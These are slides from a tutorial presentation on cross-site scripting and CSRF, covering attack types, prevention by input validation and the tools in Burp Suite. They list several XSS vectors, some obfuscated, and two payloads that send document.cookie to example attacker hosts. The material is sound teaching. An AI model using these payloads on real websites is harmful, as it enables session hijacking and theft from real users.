(XSS)
by Amit Tyagi
What is XSS
Cross Site Scripting
XSS is a vulnerability which when present in
websites or web applications, allows malicious
users (Hackers) to insert their client side
code (normally JavaScript) in those web
pages. When this malicious code along with
the original webpage gets displayed in the
web client (browsers like IE, Mozilla etc),
allows Hackers to gain greater access of
that page.
XSS input
Note: This image has been created using Firebug and this XSS hole is not
present in google.com
XSS contd.
Lets
XSS
Server
http request
with XSS
JavaScript
http response
with XSS
JavaScript
Hackers
Browser
Hackers
Browser
XSS output
Note: This image has been created using Firebug and this XSS hole is not
present in google.com
XSS vectors
<SCRIPT
SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says,
'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG
SRC=javascript:alert(String.fromCharCode(88,
83,83))>
<IMG
SRC=javascr&
#105;pt:aler
;t('XSS')>
Non-persistent
When XSS code only gets displayed in the next
page to the same user and not gets saved into
persistent storage like database. This type of
attack is less vulnerable, because Hacker can
see only their own cookies and can make
modifications in their own current opened pages.
The risk with these kinds of XSS holes is that it
opens way for Cross Site Request Forgery
CSRF. CSRF allows a hacker to place some links
Example : same as given previously to explain
XSS
CSRF
Cross-site request forgery
is a type of malicious exploit of a website whereby
unauthorized commands are transmitted from a user that
the website trusts. This can be done by placing some
hidden links in some bad website.
for example :
<img src="http://bank.example/withdraw?
account=bob<script>document.location=http://baddomain.com/store_data?cookie= +
document.cookie;</script>
CSRF
Bank Server
Bad Server 1
http response with
<img
CSRF Link
src="http://bank.exa
mple/withdraw?
account=bob<script
>document.location
=http://baddomain.com/store_d
ata?cookie= +
document.cookie;</
script>
Normal Users
Browser
http request
with XSS
http
response
with XSS
Bad Server 2
Normal Users
Browser
Persistent XSS
In persistent type of XSS attack, XSS code gets saved into
persistent storage like database with other data and then it
is visible to other users also. One example of this kind of attacks
is possible blog websites, where hacker can add their XSS code
along with the comment text and if no validation or filtering is
present on the server, XSS code can successfully saved into the
database. After this if anyone (other users) open the page into
their browsers, XSS code can execute and can perform a variety
of harmful actions. This type of attack is more vulnerable,
because Hacker can steal cookies and can make modifications in
the page. The risk with these kinds of attacks is any third party
hacker can use this vulnerability to perform some actions on
behalf of other users.
abc<script>window.location = "http://www.hackers.com?yid=" +
document.cookie;</script>
DB
DB
http response
with XSS
JavaScript
Normal User
Browser
Persistent XSS
Note: This image has been created using Firebug and this XSS hole is not
present in blogger.com
This is in contrast to other XSS attacks (stored or reflected), wherein the attack
payload is placed in the response page (due to a server side flaw).
Example
http://www.vulnerable.site/welcome.html?name=Joe
Prevention
Never trust the
user input data
No matter where its coming from
( GET, POST, COOKIE etc.
Validation at server
By sanitizing the input data, we can prevent
the malicious code to enter in the system.
Checking the proper data types helps in
cleaning the data. First of all we should restrict
numeric data for numeric fields and only
alphanumeric characters for text fields
Burp suite
Burp
Burp Tools
Proxy - an intercepting HTTP/S proxy server which operates as a man-in-the-middle between the
end browser and the target web application, allowing you to intercept, inspect and modify the raw
traffic passing in both directions.
Spider - an intelligent application-aware web spider which allows complete enumeration of an
application's content and functionality.
Scanner [Pro version only] - an advanced tool for performing automated discovery of security
vulnerabilities in web applications.
Intruder - a highly configurable tool for automating customized attacks against web applications,
such as enumerating identifiers, harvesting useful data, and fuzzing for common vulnerabilities.
Repeater - a tool for manually manipulating and re-issuing individual HTTP requests, and analyzing
the application's responses.
Sequencer - a tool for analyzing the quality of randomness in an application's session tokens or
other important data items which are intended to be unpredictable.
Decoder - a tool for performing manual or intelligent decoding and encoding of application data.
Comparer - a utility for performing a visual "diff" between any two items of data, normally pairs of
related requests and responses.
Burp Suite
How to use
Run
Questions
Refrences
http://en.wikipedia.org
http://ha.ckers.org/xss.html
http://portswigger.net
www
Thank you